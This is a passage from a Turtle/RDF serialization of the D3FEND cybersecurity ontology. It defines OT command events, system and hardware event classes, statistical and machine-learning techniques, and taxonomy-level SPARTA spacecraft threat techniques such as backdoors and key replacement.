; owl:onProperty d3f:has-participant ; owl:someValuesFrom d3f:OTLogicVariable ], [ a owl:Restriction ; owl:onProperty d3f:has-participant ; owl:someValuesFrom d3f:OTReadValueCommand ], d3f:OTReadCommandEvent . d3f:OTRemoteModeCommandEvent a owl:Class ; rdfs:label "OT Remote Mode Command Event" ; d3f:definition "Command that places the controller in a mode capable of receiving read/write communication from a networked entity." ; rdfs:subClassOf [ a owl:Restriction ; owl:onProperty d3f:has-participant ; owl:someValuesFrom d3f:NetworkTraffic ], [ a owl:Restriction ; owl:onProperty d3f:has-participant ; owl:someValuesFrom d3f:OTControllerOperatingMode ], [ a owl:Restriction ; owl:onProperty d3f:has-participant ; owl:someValuesFrom d3f:OTRemoteModeCommand ], d3f:OTModifyDeviceOperatingModeCommandEvent . d3f:OTScanTime a owl:Class ; rdfs:label "OT Scan Time" ; d3f:definition "An OT controller system variable that tracks the measured time it takes to read input status, apply logic, and write output values." ; rdfs:subClassOf d3f:ApplicationScanTime . d3f:OTSecurityCommandEvent a owl:Class ; rdfs:label "OT Security Command Event" ; d3f:definition "Ensure confidentiality, integrity, or availability of system information." ; rdfs:subClassOf [ a owl:Restriction ; owl:onProperty d3f:has-participant ; owl:someValuesFrom d3f:OTSecurityCommand ], d3f:OTNetworkManagementCommandEvent . d3f:OTSetTimeCommandEvent a owl:Class ; rdfs:label "OT Set Time Command Event" ; d3f:definition "Set timing mechanisms." ; rdfs:subClassOf [ a owl:Restriction ; owl:onProperty d3f:has-participant ; owl:someValuesFrom d3f:OTSetTimeCommand ], d3f:OTTimeCommandEvent . d3f:OTStopCommandEvent a owl:Class ; rdfs:label "OT Stop Command Event" ; d3f:definition "Commands a device to stop a service/program." ; rdfs:subClassOf [ a owl:Restriction ; owl:onProperty d3f:has-participant ; owl:someValuesFrom d3f:OTControllerOperatingMode ], [ a owl:Restriction ; owl:onProperty d3f:has-participant ; owl:someValuesFrom d3f:OTStopCommand ], [ a owl:Restriction ; owl:onProperty d3f:preceded-by ; owl:someValuesFrom d3f:OTRunCommandEvent ], d3f:OTModifyDeviceOperatingModeCommandEvent . d3f:OTSynchronizeTimeCommandEvent a owl:Class ; rdfs:label "OT Synchronize Time Command Event" ; d3f:definition "Used to align timing mechanisms." ; rdfs:subClassOf [ a owl:Restriction ; owl:onProperty d3f:has-participant ; owl:someValuesFrom d3f:OTSynchronizeTimeCommand ], d3f:OTTimeCommandEvent . d3f:OTTestCommandEvent a owl:Class ; rdfs:label "OT Test Command Event" ; d3f:definition "Commands a device to run a program in Test mode." ; rdfs:subClassOf [ a owl:Restriction ; owl:onProperty d3f:has-participant ; owl:someValuesFrom d3f:OTControllerOperatingMode ], [ a owl:Restriction ; owl:onProperty d3f:has-participant ; owl:someValuesFrom d3f:OTTestCommand ], d3f:OTModifyDeviceOperatingModeCommandEvent . d3f:OTTransportConfigurationCommandEvent a owl:Class ; rdfs:label "OT Transport Configuration Command Event" ; d3f:definition "Configure transport settings for a communication channel." ; rdfs:subClassOf [ a owl:Restriction ; owl:onProperty d3f:has-participant ; owl:someValuesFrom d3f:OTTransportConfigurationCommand ], d3f:OTNetworkManagementCommandEvent . d3f:OWL a owl:Class, owl:NamedIndividual ; rdfs:label "OWL" ; d3f:d3fend-id "D3A-OWL" ; d3f:definition "The Web Ontology Language (OWL) is a family of knowledge representation languages for authoring ontologies." ; d3f:kb-article """## How it works Ontologies are a formal way to describe taxonomies and classification networks, essentially defining the structure of knowledge for various domains: the nouns representing classes of objects and the verbs representing relations between the objects. The OWL languages are characterized by formal semantics. They are built upon the World Wide Web Consortium's (W3C) standard for objects called the Resource Description Framework (RDF). OWL classes correspond to description logic (DL) _concepts_. OWL properties to DL _roles_, and individuals are named the same way in OWL and other DLs. ## References 1. Web Ontology Language. (2023, April 23). In _Wikipedia_. [Link](https://en.wikipedia.org/wiki/Web_Ontology_Language)""" ; d3f:synonym "Web Ontology Language" ; rdfs:subClassOf d3f:DescriptionLogic . d3f:OffensiveAction a owl:Class ; rdfs:label "Offensive Action" ; rdfs:subClassOf d3f:CyberAction . d3f:Open-sourceDeveloper a owl:Class ; rdfs:label "Open-source Developer" ; d3f:definition "An open-source developer contributes to the development, maintenance, or improvement of open-source projects." ; rdfs:subClassOf d3f:ProductDeveloper . d3f:OperatingSystemConfigurationModificationEvent a owl:Class ; rdfs:label "Operating System Configuration Modification Event" ; d3f:definition "An event that alters persistent operating-system configuration resources such as kernel options, registry keys, service definitions, or security policies; affecting system startup, hardware interfaces, or global security enforcement." ; rdfs:subClassOf [ a owl:Restriction ; owl:onProperty d3f:has-participant ; owl:someValuesFrom d3f:OperatingSystemConfiguration ], d3f:ConfigurationModificationEvent . d3f:OperatingSystemPackagingTool a owl:Class ; rdfs:label "Operating System Packaging Tool" ; d3f:definition "A software packaging tool oriented on building a software package for a particular operating system (e.g. rpmbuild.)" ; rdfs:subClassOf d3f:SoftwarePackagingTool . d3f:OperationalEvent a owl:Class ; rdfs:label "Operational Event" ; d3f:definition "An Operational Event is an action or occurrence within an organization's mission or business operations that happens over a period of time." ; d3f:synonym "Business Event", "Business Process", "Mission Event", "Operational Activity Event", "Operational Occurrence" ; rdfs:seeAlso , , ; rdfs:subClassOf d3f:Action . d3f:OperationsCenterComputer a owl:Class ; rdfs:label "Operations Center Computer" ; d3f:definition "Mainframe computers or mainframes (colloquially referred to as \"big iron\") are computers used primarily by large organizations for critical applications; bulk data processing, such as census, industry and consumer statistics, and enterprise resource planning; and transaction processing. They are larger and have more processing power than some other classes of computers: minicomputers, servers, workstations, and personal computers." ; rdfs:isDefinedBy ; rdfs:seeAlso ; rdfs:subClassOf d3f:SharedComputer ; skos:altLabel "Mainframe" . d3f:OpticalDiscImage a owl:Class ; rdfs:label "Optical Disc Image" ; d3f:definition "An optical disc image (or ISO image, from the ISO 9660 file system used with CD-ROM media) is a disk image that contains everything that would be written to an optical disc, disk sector by disc sector, including the optical disc file system." ; rdfs:isDefinedBy ; rdfs:seeAlso ; rdfs:subClassOf d3f:DiskImage . d3f:OpticalModem a owl:Class ; rdfs:label "Optical Modem" ; d3f:definition "A modem that connects to a fiber optic network is known as an optical network terminal (ONT) or optical network unit (ONU). These are commonly used in fiber to the home installations, installed inside or outside a house to convert the optical medium to a copper Ethernet interface, after which a router or gateway is often installed to perform authentication, routing, NAT, and other typical consumer internet functions, in addition to \"triple play\" features such as telephony and television service." ; rdfs:isDefinedBy ; rdfs:subClassOf d3f:Modem . d3f:OrchestrationWorker a owl:Class ; rdfs:label "Orchestration Worker" ; d3f:definition "A d3f:Server which receives commands from a d3f:OrchestrationController to execute workloads." ; rdfs:seeAlso d3f:OrchestrationController ; rdfs:subClassOf d3f:OrchestrationServer . d3f:OutboundInternetRPCTraffic a owl:Class ; rdfs:label "Outbound Internet RPC Traffic" ; d3f:definition "Outbound internet RPC traffic is RPC traffic that is: (a) on an outgoing connection initiated from a host within a network to a host outside the network, and (b) using a standard RPC protocol." ; rdfs:seeAlso , ; rdfs:subClassOf d3f:OutboundInternetNetworkTraffic, d3f:OutboundNetworkTraffic, d3f:RPCNetworkTraffic . d3f:OutputDeviceEvent a owl:Class ; rdfs:label "Output Device Event" ; d3f:definition "An event describing the activity or state of output devices, including sound cards, display adapters, or media controllers. These events relate to audio, video, or graphics functionality." ; rdfs:subClassOf [ a owl:Restriction ; owl:onProperty d3f:has-participant ; owl:someValuesFrom d3f:OutputDevice ], d3f:HardwareDeviceEvent . d3f:PE32ExecutableFile a d3f:ExecutableBinary, owl:NamedIndividual ; rdfs:label "PE32 Executable File" . d3f:PE32PLUSExecutableFile a d3f:ExecutableBinary, owl:NamedIndividual ; rdfs:label "PE32+ Executable File" . d3f:PER-0001 a owl:Class ; rdfs:label "Memory Compromise - SPARTA" ; d3f:attack-id "PER-0001" ; d3f:definition "Threat actors may manipulate memory (boot, RAM, etc.) in order for their malicious code and/or commands to remain on the victim spacecraft. The spacecraft may have mechanisms that allow for the automatic running of programs on system reboot, entering or returning to/from safe mode, or during specific events. Threat actors may target these specific memory locations in order to store their malicious code or file, ensuring that the attack remains on the system even after a reset." ; rdfs:seeAlso ; rdfs:subClassOf d3f:SPARTAPersistenceTechnique ; skos:prefLabel "Memory Compromise" . d3f:PER-0002.01 a owl:Class ; rdfs:label "Hardware Backdoor - SPARTA" ; d3f:attack-id "PER-0002.01" ; d3f:definition "Threat actors may find and target various hardware backdoors within the victim spacecraft in the hopes of maintaining their attack. Once in orbit, mitigating the risk of various hardware backdoors becomes increasingly difficult for ground controllers. By targeting these specific vulnerabilities, threat actors are more likely to remain persistent on the victim spacecraft and perpetuate further attacks." ; rdfs:seeAlso ; rdfs:subClassOf d3f:PER-0002 ; skos:prefLabel "Hardware Backdoor" . d3f:PER-0002.02 a owl:Class ; rdfs:label "Software Backdoor - SPARTA" ; d3f:attack-id "PER-0002.02" ; d3f:definition "Threat actors may inject code to create their own backdoor to establish persistent access to the spacecraft. This may be done through modification of code throughout the software supply chain or through modification of the software-defined radio configuration (if applicable)." ; rdfs:seeAlso ; rdfs:subClassOf d3f:PER-0002 ; skos:prefLabel "Software Backdoor" . d3f:PER-0003 a owl:Class ; rdfs:label "Ground System Presence - SPARTA" ; d3f:attack-id "PER-0003" ; d3f:definition "Threat actors may compromise target owned ground systems that can be used for persistent access to the spacecraft or to perpetuate other techniques. These ground systems have already been configured for communications to the victim spacecraft. By compromising this infrastructure, threat actors can stage, launch, and execute persistently." ; rdfs:seeAlso ; rdfs:subClassOf d3f:SPARTAPersistenceTechnique ; skos:prefLabel "Ground System Presence" . d3f:PER-0004 a owl:Class ; rdfs:label "Replace Cryptographic Keys - SPARTA" ; d3f:attack-id "PER-0004" ; d3f:definition "Threat actors may attempt to fully replace the cryptographic keys on the spacecraft which could lockout the mission operators and enable the threat actor's communication channel. Once the encryption key is changed on the spacecraft, the spacecraft is rendered inoperable from the operators perspective as they have lost commanding access. Threat actors may exploit weaknesses in the key management strategy. For example, the threat actor may exploit the over-the-air rekeying procedures to inject their own cryptographic keys." ; rdfs:seeAlso ; rdfs:subClassOf d3f:SPARTAPersistenceTechnique ; skos:prefLabel "Replace Cryptographic Keys" . d3f:PER-0005 a owl:Class ; rdfs:label "Credentialed Persistence - SPARTA" ; d3f:attack-id "PER-0005" ; d3f:definition "Threat actors may acquire or leverage valid credentials to maintain persistent access to a spacecraft or its supporting command and control (C2) systems. These credentials may include system service accounts, user accounts, maintenance access credentials, cryptographic keys, or other authentication mechanisms that enable continued entry without triggering access alarms. By operating with legitimate credentials, adversaries can sustain access over extended periods, evade detection, and facilitate follow-on tactics such as command execution, data exfiltration, or lateral movement. Credentialed persistence is particularly effective in environments lacking strong credential lifecycle management, segmentation, or monitoring allowing threat actors to exploit trusted pathways while remaining embedded in mission operations." ; rdfs:seeAlso ; rdfs:subClassOf d3f:SPARTAPersistenceTechnique ; skos:prefLabel "Credentialed Persistence" . d3f:POSIXSymbolicLink a owl:Class ; rdfs:label "POSIX Symbolic Link" ; d3f:definition "A POSIX-compliant symbolic link. These are often fast symbolic links, but need not be." ; rdfs:isDefinedBy ; rdfs:subClassOf d3f:SymbolicLink, d3f:UnixLink . d3f:PackageURL a owl:Class, owl:NamedIndividual ; rdfs:label "Package URL" ; d3f:definition "A package URL, or purl, is a URL used to identify a software package in a mostly universal and uniform way across programming languages, package managers, packaging conventions, tools, APIs and databases." ; d3f:identifies d3f:SoftwarePackage ; rdfs:isDefinedBy ; rdfs:seeAlso ; rdfs:subClassOf [ a owl:Restriction ; owl:onProperty d3f:identifies ; owl:someValuesFrom d3f:SoftwarePackage ], d3f:URL ; skos:altLabel "purl" . d3f:PacketLog a owl:Class, owl:NamedIndividual ; rdfs:label "Packet Log" ; d3f:definition "A log of all the network packet data captured from a network by a network sensor (i.e., packet analyzer)," ; d3f:records d3f:NetworkSession ; d3f:summarizes d3f:PacketCaptureFile ; rdfs:seeAlso ; rdfs:subClassOf [ a owl:Restriction ; owl:onProperty d3f:summarizes ; owl:someValuesFrom d3f:PacketCaptureFile ], [ a owl:Restriction ; owl:onProperty d3f:records ; owl:someValuesFrom d3f:NetworkSession ], d3f:Log . d3f:Page a owl:Class ; rdfs:label "Page" ; d3f:definition "A page, memory page, logical page, or virtual page is a fixed-length contiguous block of virtual memory, described by a single entry in the page table. It is the smallest unit of data for memory management in a virtual memory operating system." ; rdfs:isDefinedBy ; rdfs:subClassOf d3f:MemoryBlock . d3f:Parameter-basedTransferLearning a owl:Class, owl:NamedIndividual ; rdfs:label "Parameter-based Transfer Learning" ; d3f:d3fend-id "D3A-PBTL" ; d3f:definition "The idea behind parameter-based methods is that a well-trained model on the source domain has learned a well-defined structure, and if two tasks are related, this structure can be transferred to the target model." ; d3f:kb-article """## References Georgian Impact Blog. (n.d.). Transfer Learning Part 1. [Link](https://medium.com/georgian-impact-blog/transfer-learning-part-1-ed0c174ad6e7#:~:text=Homogeneous%20Transfer%20Learning-,1.,the%20target%20domain%20for%20training).""" ; rdfs:subClassOf d3f:HomogenousTransferLearning . d3f:ParametricTests a owl:Class, owl:NamedIndividual ; rdfs:label "Parametric Tests" ; d3f:d3fend-id "D3A-PT" ; d3f:definition "A parametric test relies upon the assumption that the data you want to test is (or approximately is) normally distributed." ; d3f:kb-article """## References Newcastle University. (n.d.). Parametric Hypothesis Tests. [Link](https://www.ncl.ac.uk/webtemplate/ask-assets/external/maths-resources/psychology/parametric-hypothesis-tests.html)""" ; rdfs:subClassOf d3f:HypothesisTesting . d3f:ParentProcess a owl:Class ; rdfs:label "Parent Process" ; d3f:definition "In computing, a parent process is a process that has created one or more child processes." ; rdfs:isDefinedBy ; rdfs:seeAlso ; rdfs:subClassOf d3f:Process . d3f:PasswordManager a owl:Class, owl:NamedIndividual ; rdfs:label "Password Manager" ; d3f:contains d3f:Credential ; d3f:definition "A password manager is a software application or hardware that helps a user store and organize passwords. Password managers usually store passwords encrypted, requiring the user to create a master password: a single, ideally very strong password which grants the user access to their entire password database. Some password managers store passwords on the user's computer (called offline password managers), whereas others store data in the provider's cloud (often called online password managers). However offline password managers also offer data storage in the user's own cloud accounts rather than the provider's cloud. While the core functionality of a password manager is to securely store large collections of passwords, many provide additional features such as form filling and password generation." ; rdfs:isDefinedBy ; rdfs:subClassOf [ a owl:Restriction ; owl:onProperty d3f:contains ; owl:someValuesFrom d3f:Credential ], d3f:Application . d3f:PearsonsCorrelationCoefficient a owl:Class, owl:NamedIndividual ; rdfs:label "Pearson's Correlation Coefficient" ; d3f:d3fend-id "D3A-PCC" ; d3f:kb-article """## References Wolfram MathWorld. (n.d.). Correlation Coefficient. [Link](https://mathworld.wolfram.com/CorrelationCoefficient.html)""" ; rdfs:subClassOf d3f:Correlation . d3f:PeripheralDeviceEvent a owl:Class ; rdfs:label "Peripheral Device Event" ; d3f:definition "An event involving external or auxiliary devices, such as USB drives, Thunderbolt peripherals, or Bluetooth devices. Peripheral events provide visibility into resource availability and potential unauthorized access." ; rdfs:subClassOf [ a owl:Restriction ; owl:onProperty d3f:has-participant ; owl:someValuesFrom d3f:RemovableMediaDevice ], d3f:HardwareDeviceEvent . d3f:PeripheralHubFirmware a owl:Class ; rdfs:label "Peripheral Hub Firmware" ; d3f:definition "Firmware that is installed on peripheral hub device such as a USB or Firewire hub." ; rdfs:seeAlso ; rdfs:subClassOf d3f:PeripheralFirmware ; skos:altLabel "USB Hub Firmware" . d3f:Perturbation-basedLearning a owl:Class, owl:NamedIndividual ; rdfs:label "Perturbation-based Learning" ; d3f:d3fend-id "D3A-PBL" ; d3f:definition "Perturbation based methods are proposed under the smoothness assumption, which indicates that two data points close to each other in feature space are likely to have the same label." ; d3f:kb-article """## References Zheng, Y., & Song, Y. (2021). An Effective Perturbation-Based Semi-Supervised Learning Method for Acoustic Event Classification. IEEE/ACM Transactions on Audio, Speech, and Language Processing, 29, 3580-3591. [Link](https://www.semanticscholar.org/paper/An-Effective-Perturbation-Based-Semi-Supervised-for-Zheng-Song/b75ae37d137ac354eb2ed42917e461b4dccdc977). Engelen, S., & Hoos, H. (2020). A survey on semi-supervised learning. Machine Learning, 109(2), 299-337. [Link](https://link.springer.com/article/10.1007/s10994-019-05855-6).""" ; rdfs:subClassOf d3f:IntrinsicallySemi-supervisedLearning . d3f:PhiCoefficient a owl:Class, owl:NamedIndividual ; rdfs:label "Phi Coefficient" ; d3f:d3fend-id "D3A-PC" ; d3f:definition "The phi coefficient (or mean square contingency coefficient is a measure of association for two binary variables." ; d3f:kb-article """## References \\Wikipedia. (n.d.). Phi coefficient. [Link](https://en.wikipedia.org/wiki/Phi_coefficient)""" ; d3f:synonym "MCC", "Matthews Correlation Coefficient (in machine learning)" ; rdfs:subClassOf d3f:Correlation . d3f:PhysicalAttacker a owl:Class ; rdfs:label "Physical Attacker" ; d3f:definition "An attacker who is physically close enough to interact with the system directly, such as through physical access to devices." ; rdfs:subClassOf [ a owl:Restriction ; owl:onProperty d3f:accesses ; owl:someValuesFrom d3f:ComputerPlatform ], [ a owl:Restriction ; owl:onProperty d3f:accesses ; owl:someValuesFrom d3f:HardwareDevice ], d3f:LocalAttacker . d3f:PhysicalLinkDisableEvent a owl:Class ; rdfs:label "Physical Link Disable Event" ; d3f:definition "An administrator issues a shutdown or disable command, forcing the link out of service regardless of signal status." ; rdfs:subClassOf [ a owl:Restriction ; owl:onProperty d3f:preceded-by ; owl:someValuesFrom d3f:PhysicalLinkUpEvent ], d3f:PhysicalLinkEvent . d3f:PhysicalLinkErrorDisableEvent a owl:Class ; rdfs:label "Physical Link Error Disable Event" ; d3f:definition "The device automatically disables the link in response to fault conditions such as excessive faults or signal degradation." ; rdfs:subClassOf [ a owl:Restriction ; owl:onProperty d3f:preceded-by ; owl:someValuesFrom d3f:PhysicalLinkDownEvent ], d3f:PhysicalLinkEvent . d3f:Pix2Pix a owl:Class, owl:NamedIndividual ; rdfs:label "Pix2Pix" ; d3f:d3fend-id "D3A-PIX" ; d3f:definition "Pix2Pix is based on condtional GAN architecture and are trained on paired set of images or scenes from two domains to be used for translation." ; d3f:kb-article """## References Esri. (n.d.). How Pix2Pix Works. [Link](https://developers.arcgis.com/python/guide/how-pix2pix-works/)""" ; rdfs:subClassOf d3f:Image-to-ImageTranslationGAN . d3f:Point-biserialCorrelationCoefficient a owl:Class, owl:NamedIndividual ; rdfs:label "Point-biserial Correlation Coefficient" ; d3f:d3fend-id "D3A-PBCC" ; d3f:definition "The point biserial correlation coefficient (rpb) is a correlation coefficient used when one variable (e.g. Y) is dichotomous; Y can either be \"naturally\" dichotomous, like whether a coin lands heads or tails, or an artificially dichotomized variable." ; d3f:kb-article """## References Wikipedia. (n.d.). Point-biserial correlation coefficient. [Link](https://en.wikipedia.org/wiki/Point-biserial_correlation_coefficient)""" ; rdfs:subClassOf d3f:Correlation . d3f:PointEstimation a owl:Class, owl:NamedIndividual ; rdfs:label "Point Estimation" ; d3f:d3fend-id "D3A-PE" ; d3f:definition "A point estimation is a single value that estimates the parameter. Point estimates are single values calculated from the sample" ; d3f:kb-article """## References Pennsylvania State University. (n.d.). Statistical Inference and Estimation. [Link](https://online.stat.psu.edu/stat504/lesson/statistical-inference-and-estimation)""" ; rdfs:subClassOf d3f:Estimation . d3f:PowerAndThermalDeviceEvent a owl:Class ; rdfs:label "Power and Thermal Device Event" ; d3f:definition "An event involving power supplies, batteries, or thermal management devices. These events represent changes in power states, temperature thresholds, or cooling system activity." ; rdfs:subClassOf [ a owl:Restriction ; owl:onProperty d3f:has-participant ; owl:someValuesFrom d3f:Sensor ], d3f:HardwareDeviceEvent . d3f:PowershellScriptFile a d3f:ExecutableScript, owl:NamedIndividual ; rdfs:label "Powershell Script File" . d3f:PreAuthenticationEvent a owl:Class ; rdfs:label "Pre-Authentication Event" ; d3f:definition "An event representing preparatory steps or processes conducted prior to the primary authentication operation. Pre-authentication often involves initial protocol exchanges, cryptographic challenges, or the validation of supplemental factors (e.g., pre-shared keys) to ensure the readiness and security of the authentication workflow." ; rdfs:subClassOf [ a owl:Restriction ; owl:onProperty d3f:precedes ; owl:someValuesFrom d3f:Authentication ], d3f:AuthenticationEvent . d3f:PrincipalComponentAnalysis a owl:Class, owl:NamedIndividual ; rdfs:label "Principal Component Analysis" ; d3f:d3fend-id "D3A-PCA" ; d3f:definition "Principal components analysis (PCA) creates a new set of orthogonal variables that contain the same information as the original set. It rotates the axes of variation to give a new set of orthogonal axes, ordered so that they summarize decreasing proportions of the variation." ; d3f:kb-article """## References Wikipedia. (n.d.). Multivariate statistics. [Link](https://en.wikipedia.org/wiki/Multivariate_statistics)""" ; d3f:synonym "PCA" ; rdfs:subClassOf d3f:MultivariateAnalysis . d3f:PrincipalComponentsAnalysis a owl:Class, owl:NamedIndividual ; rdfs:label "Principal Components Analysis" ; d3f:d3fend-id "D3A-PCA" ; d3f:definition "Principal Component Analysis (PCA) is a statistic-based method of identifying patterns in a large dataset while increasing interpretability and preserving information." ; d3f:kb-article """## References Wikipedia. (n.d.). Principal component analysis. [Link](https://en.wikipedia.org/wiki/Principal_component_analysis)""" ; rdfs:subClassOf d3f:DimensionReduction . d3f:PrintServer a owl:Class ; rdfs:label "Print Server" ; d3f:definition "A print server, or printer server, is a device that connects printers to client computers over a network. It accepts print jobs from the computers and sends the jobs to the appropriate printers, queuing the jobs locally to accommodate the fact that work may arrive more quickly than the printer can actually handle." ; rdfs:isDefinedBy ; rdfs:subClassOf d3f:Server . d3f:ProbabilisticLogic a owl:Class, owl:NamedIndividual ; rdfs:label "Probabilistic Logic" ; d3f:d3fend-id "D3A-PL" ; d3f:definition "Probabilistic logic extends traditional logic truth tables with probabilistic expressions." ; d3f:kb-article """## References 1. Probabilistic logic. (2023, June 5). In _Wikipedia_. [Link](https://en.wikipedia.org/wiki/Probabilistic_logic)""" ; rdfs:subClassOf d3f:SymbolicAI . d3f:ProcessAccessEvent a owl:Class ; rdfs:label "Process Access Event" ; d3f:definition "An event where one process interacts with another, such as reading memory, inspecting state, or altering behavior." ; rdfs:subClassOf [ a owl:Restriction ; owl:onProperty d3f:preceded-by ; owl:someValuesFrom d3f:ProcessCreationEvent ], d3f:ProcessEvent . d3f:ProcessSetUserIDEvent a owl:Class ; rdfs:label "Process Set User ID Event" ; d3f:definition "An event where a process changes or adopts a specific user identity, modifying its access privileges or operational context." ; rdfs:subClassOf [ a owl:Restriction ; owl:onProperty d3f:preceded-by ; owl:someValuesFrom d3f:ProcessCreationEvent ], d3f:ProcessEvent . d3f:ProcessTerminationEvent a owl:Class ; rdfs:label "Process Termination Event" ; d3f:definition "An event marking the cessation of a process, including resource deallocation and cleanup, either due to normal completion or abnormal termination." ; rdfs:subClassOf [ a owl:Restriction ; owl:onProperty d3f:preceded-by ; owl:someValuesFrom d3f:ProcessCreationEvent ], d3f:ProcessEvent . d3f:ProgressivelyGrowingGAN a owl:Class, owl:NamedIndividual ; rdfs:label "Progressively Growing GAN" ; d3f:d3fend-id "D3A-PGG" ; d3f:definition "Progressive Growing GAN (ProGAN) is an extension to the GAN training process that allows for the stable training of generator models that can output large high-quality images." ; d3f:kb-article """## References Machine Learning Mastery. (n.d.). Introduction to Progressive Growing Generative Adversarial Networks. [Link](https://machinelearningmastery.com/introduction-to-progressive-growing-generative-adversarial-networks/)""" ; d3f:synonym "ProGAN" ; rdfs:subClassOf d3f:ImageSynthesisGAN . d3f:ProjectedClustering a owl:Class, owl:NamedIndividual ; rdfs:label "Projected Clustering" ; d3f:d3fend-id "D3A-PC" ; d3f:definition "Projected clustering is a dimension reduction subspace clustering method." ; d3f:kb-article """## References GeeksforGeeks. (n.d.). Projected Clustering in Data Analytics. [Link](https://www.geeksforgeeks.org/projected-clustering-in-data-analytics/)""" ; rdfs:subClassOf d3f:High-dimensionClustering . d3f:Prolog a owl:Class, owl:NamedIndividual ; rdfs:label "Prolog" ; d3f:d3fend-id "D3A-PRO" ; d3f:definition "Prolog has its roots in first-order logic, a formal logic, and unlike many other programming languages." ; d3f:kb-article """## How it works Prolog is intended primarily as a declarative programming language: the program logic is expressed in terms of relations, represented as facts and rules. A computation is initiated by running a query over these relations. ## References 1. Prolog. (2023, April 5). In _Wikipedia_. [Link](https://en.wikipedia.org/wiki/Prolog)""" ; rdfs:subClassOf d3f:LogicProgramming . d3f:PropositionalLogic a owl:Class, owl:NamedIndividual ; rdfs:label "Propositional Logic" ; d3f:d3fend-id "D3A-PL" ; d3f:definition "Propositional logic deals with statements (i.e., propositions, which can be true or false) and relations between propositions, including the construction of arguments based on them." ; d3f:kb-article """## How it works Compound propositions are formed by connecting propositions by logical connectives. Propositions that contain no logical connectives are called atomic propositions. ## References 1. Propositional Calculus. (2022, May 31). In _Wikipedia_. [Link](https://en.wikipedia.org/wiki/Propositional_calculus)""" ; d3f:synonym "Propositional Calculus" ; rdfs:subClassOf d3f:SymbolicAI . d3f:ProximitySensorEvent a owl:Class ; rdfs:label "Proximity Sensor Event" ; rdfs:subClassOf [ a owl:Restriction ; owl:onProperty d3f:has-participant ; owl:someValuesFrom d3f:ProximitySensor ], d3f:PhysicalAccessAlarmEvent . d3f:PythonPackage a owl:Class ; rdfs:label "Python Package" ; d3f:definition "A Python package is an aggregation of many Python files - either in source code or in bytecode - and associated metadata and resources (text, images, etc.). Python packages can be distributed in different file formats." ; rdfs:seeAlso ; rdfs:subClassOf d3f:SoftwarePackage . d3f:PythonScriptFile a owl:Class ; rdfs:label "Python Script File" ; d3f:synonym "A script file written in the Python programming language." ; rdfs:subClassOf d3f:ExecutableScript . d3f:QueryByCommittee a owl:Class, owl:NamedIndividual ; rdfs:label "Query By Committee" ; d3f:d3fend-id "D3A-QBC" ; d3f:definition "Query by Committee (QBC) takes inspiration from ensemble methods. Instead of just one classifier, it takes into account the decision of a committee C=ℎ1,…,ℎc of classifiers ℎi. Each classifier has the same target classes, but a different underlying model or a different view on the data." ; d3f:kb-article """## References Intro to Active Learning. inovex Blog. [Link](https://www.inovex.de/de/blog/intro-to-active-learning/).""" ; rdfs:subClassOf d3f:ActiveLearning . d3f:RAM a owl:Class ; rdfs:label "RAM" ; d3f:definition "Random-access memory (RAM) is a form of computer memory that can be read and changed in any order, typically used to store working data and machine code." ; d3f:synonym "Random-access Memory" ; rdfs:isDefinedBy ; rdfs:subClassOf d3f:PrimaryStorage . d3f:RD-0001.01 a owl:Class ; rdfs:label "Ground Station Equipment - SPARTA" ; d3f:attack-id "RD-0001.01" ; d3f:definition """Threat actors will likely need to acquire the following types of equipment to establish ground-to-space communications: Antenna positioners: which also usually come with satellite tracking antenna systems, in order to accurately send and receive signals along several different bands. This infrastructure is useful in pinpointing the location of a spacecraft in the sky. Ground antennas: in order to send commands and receive telemetry from the victim spacecraft. Threat actors can utilize these antennas in relation to other tactics such as execution and exfiltration. Instead of compromising a third-part ground station, threat actors may opt to configure and run their own antennas in support of operations. Ground data processors: in order to convert RF signals to TCP packets. This equipment is utilized in ground stations to convert the telemetry into human readable format. Ground radio modems: in order to convert TCP packs to RF signals. This equipment is utilized in ground stations to convert commands into RF signals in order to send them to orbiting spacecraft. Signal generator: in order to configure amplitude, frequency, and apply modulations to the signal. Additional examples of equipment include couplers, attenuators, power dividers, diplexers, low noise amplifiers, high power amplifiers, filters, mixers, spectrum analyzers, etc.""" ; rdfs:seeAlso ; rdfs:subClassOf d3f:RD-0001 ; skos:prefLabel "Ground Station Equipment" . d3f:RD-0001.02 a owl:Class ; rdfs:label "Commercial Ground Station Services - SPARTA" ; d3f:attack-id "RD-0001.02" ; d3f:definition "Threat actors may buy or rent commercial ground station services. These services often have all of the individual parts that are needed to properly communicate with spacecrafts. By utilizing existing infrastructure, threat actors may save time, money, and effort in order to support operations." ; rdfs:seeAlso ; rdfs:subClassOf d3f:RD-0001 ; skos:prefLabel "Commercial Ground Station Services" . d3f:RD-0001.03 a owl:Class ; rdfs:label "Spacecraft - SPARTA" ; d3f:attack-id "RD-0001.03" ; d3f:definition "Threat actors may acquire their own spacecraft that has the capability to maneuver within close proximity to a target spacecraft. Since many of the commercial and military assets in space are tracked, and that information is publicly available, attackers can identify the location of space assets to infer the best positioning for intersecting orbits. Proximity operations support avoidance of the larger attenuation that would otherwise affect the signal when propagating long distances, or environmental circumstances that may present interference." ; rdfs:seeAlso ; rdfs:subClassOf d3f:RD-0001 ; skos:prefLabel "Spacecraft" . d3f:RD-0001.04 a owl:Class ; rdfs:label "Launch Facility - SPARTA" ; d3f:attack-id "RD-0001.04" ; d3f:definition "Threat actors may need to acquire a launch facility, which is a specialized location designed for launching spacecraft and rockets into space. These facilities typically include launch pads, control centers, and assembly buildings, and are often located near bodies of water or in remote areas to minimize potential safety hazards and provide enough room for rocket launches. Launch facilities can be operated by the military, national space agencies such as NASA in the United States or Roscosmos in Russia, or by private companies such as SpaceX or Blue Origin." ; rdfs:seeAlso ; rdfs:subClassOf d3f:RD-0001 ; skos:prefLabel "Launch Facility" . d3f:RD-0002.01 a owl:Class ; rdfs:label "Mission-Operated Ground System - SPARTA" ; d3f:attack-id "RD-0002.01" ; d3f:definition "Threat actors may compromise mission owned/operated ground systems that can be used for future campaigns or to perpetuate other techniques. These ground systems have already been configured for communications to the victim spacecraft. By compromising this infrastructure, threat actors can stage, launch, and execute an operation. Threat actors may utilize these systems for various tasks, including Execution and Exfiltration." ; rdfs:seeAlso ; rdfs:subClassOf d3f:RD-0002 ; skos:prefLabel "Mission-Operated Ground System" . d3f:RD-0002.02 a owl:Class ; rdfs:label "3rd Party Ground System - SPARTA" ; d3f:attack-id "RD-0002.02" ; d3f:definition "Threat actors may compromise access to third-party ground systems that can be used for future campaigns or to perpetuate other techniques. These ground systems can be or may have already been configured for communications to the victim spacecraft. By compromising this infrastructure, threat actors can stage, launch, and execute an operation." ; rdfs:seeAlso ; 